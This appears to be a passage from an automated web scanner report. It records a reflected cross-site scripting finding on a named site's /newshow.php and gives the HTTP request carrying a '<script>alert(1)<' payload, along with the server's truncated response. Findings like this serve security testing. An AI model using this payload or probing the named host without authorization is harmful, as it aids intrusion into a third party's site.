1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.xda.cn |
Path: | /newshow.php |
GET /newshow.php?3b522<script>alert(1)< Host: www.xda.cn Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.8.52 Date: Sun, 07 Nov 2010 21:11:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=24abc2e844 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 820 <html> <head> <meta content="text/html; charset=" http-equiv="Content-Type" <style type="text/css"> body,p,pre { font:12px Verdana; } </style> </head> <body bgcolor="#FFFFFF" text="#000000" link="#00 ...[SNIP]... </b>: http://www.xda.cn/newshow <br /> ...[SNIP]... |